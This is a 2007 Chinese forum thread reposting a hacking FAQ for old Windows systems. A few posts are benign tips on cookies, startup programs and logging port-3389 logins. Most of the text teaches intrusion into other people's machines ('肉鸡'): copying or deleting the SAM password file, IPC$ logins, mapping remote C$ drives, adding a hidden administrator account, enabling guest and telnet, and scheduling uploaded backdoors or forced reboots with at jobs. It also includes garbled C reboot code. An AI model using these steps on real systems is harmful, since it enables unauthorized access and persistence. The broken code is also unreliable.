level 6
另外,有没有彻底禁止cookie的方法呢? 呵呵,当然有了!在IE的Internet选项中,找到隐私选项卡!,把里面的滑块拖到最上面,边上写着:阻止所有cookie,呵呵,是不是? 另外一种方法:找到Windows目录下的cookies目录!把里面的txt文件全部删除!,最后应该只剩下一个index.dat文件!之后把这个文件夹设置成只读就可以了~ 不过,禁止cookie后,大部分的论坛都无法正常登陆了啊!呵呵,到底禁止不禁止就看你自己的了~ 8)安装2000的时候,速度会特别特别特别慢,怎么加快安装速度呢? 在DOS上面安装,应该用98启动光盘来引导系统!然后按照下面的方法来做,可以提高安装速度: g:\>cd windows -------假设G为光驱 windows为98的安装目录! g:\windows>smartdrv -------加载smartdrv程序!加载后没有任何提示信息!只要不返回错误信息就是加载成功了~这时候安装2K的话,速度会很快的哦~ 9)Windows2K密码忘记了,如何才能进入系统? Windows2K的用户配置信息和密码保存在SAM文件里!该文件位于:c:\winnt\system32\config目录中!只要删除这个文件就可以了~ 另外,在c:\winnt\repair目录中也同样有一个SAM文件(这个是前者的备份!)如果你在登陆肉鸡的时候,copy前面那个目录中的SAM文件,你会发现COPY不下来!呵呵,为什么?因为运行着的2K系统会保护SAM文件啊~这个时候你就COPY这个就可以了! 10)ping不到,tracert不到,但是却能用nbtstat显示对方的一些信息,为什么? 因为tracert和ping命令使用的是ICMP协议!而nbtstat是通过对方的netbios端口来获得对方的主机信息的!使用的是UDP和TCP协议!如果对方仅仅只对ICMP协议做了禁止的话,那通过这个命令获得系统信息是正常的! 11)telnet上去后,如何给对方开共享? 开共享的命令如下:net share c=c:\winnt\system 返回共享成功 之后直接利用\\ip\c来访问对方的system目录了~删除共享用 share c /del 命令就可以了 12)如何判断对方的具体操作系统版本? 首先用ver命令查看对方的版本号! 如果是5.00.2195的话,为2K;5.1.2600为XP 从这里可以区分出来到底是2K还是XP了~下面进行更加具体的区分! 2K的pro和svr版本区分: 在telnet下,net shart查看启动的服务~如果对方开启了Terminal Services服务的话,基本上可以判断为svr以上的版本了~如果没有开启,则为pro!(具体方法有三种,因为前几天在论坛中我回复过暗界了~所以这里就不再重复了~) XP的pro和home版的区分: home edition是无法安装iis的!所以,可以通过iis服务来判断到底是home版或者是pro了~ 当然了,如果对方是pro,但是将iis删除(停用)的话,就没办法判断了~呵呵 13)如何查看98的随机启动的程序? 在98下有一个实用配置程序(msconfig),中文名为:系统配置实用程序,调用的方法是在:开始--运行中输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!因为很有可能是木马!) 除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!只不过在这里更方便查看而已! 14)设置了BIOS密码,可是却忘记了,该怎么办? 如果是可以进入Windows的话,可以找找biospwds和cmospwd这两个软件看看~ 还有利用DEBUG法: 简单介绍两种: 1)-o 70 16 -o 71 13 -q退出 2)-o 70 16 -o 71 16 -q
2007年07月12日 00点07分
3
level 6
如果你使用NT主机的话,那你可要注意了! 重启NT主机的方法如下: 1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username" 建立一个IPC连接 2:net use H: \\XXX.XXX.XXX.XXX\C$ 将对方的C盘映射为自己的h盘 3:copy c on h:\reboot.bat Iisreset /reboot CTRL+Z 在对方的C盘上生成一个能重启机器的文件 4:net time \\XXX.XXX.XXX.XXX 得到对方机器时间 5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat 设定对方重启的时间! 6:at \\XXX.XXX.XXX.XXX 查看任务上面是否添加了这个任务 7:等对方重启好了~ 上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
#include "stdio.h" #
include "windows.h" int main() { 文件://定义重启的时候发送给所有用户的消息 LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";; 文件://尝试用最简单的API函数重启 if(ExitWindowXXX(EWX_REBOOT.0))return TRUE; if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE; 文件://因为上面的重启不成功,所以需要调整本进程的特权 HANDLE hToken; TOKEN_PRIVILEGES tkp; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE; 文件://获取重启的特权 SE_SHUTDOWN_NAME LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); tkp.PrivilegeCount=1; tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0); 文件://判断是NT内核还是9X内核,选择用不同的方式 if(!GetVersion()& 0x80000000)) InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE); else if (!ExitWindowXXX(EWX_REBOOT,0)) if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0)) return FALSE; return TRUE; 对了,再次说明啊,别用本文提到的方法搞破坏,小心警察叔叔打PP~呵呵 24)利用批处理文件来建立一个记录3389登陆者信息的记录器 由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单: 建立一个批处理文件:内容如下: @echo off date/t >> c:\3389log.txt :TS3389 time/t >> c:\3389log.txt netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt goto :TS3389 之后保存! 如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵 25)网络命令小节 A、NET命令: IPC连接:格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接~』 net use \\对方IP\ipc$ /delete 『断开连接~』 以下操作需要在连接到对方主机后才可进行!!! net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』 net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』 net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』 net start telnet 『开启TELNET』 net user guest /active:yes 『激活GUEST』 net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』 B、AT命令: 查看远程机时间:net time \\对方IP 加入一项新任务: at \\对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』 C、TELNET命令:
2007年07月12日 00点07分
6
level 6
http://post.baidu.com/f?kz=165078712原帖已经有丢楼,将就着看看
2007年07月12日 00点07分
15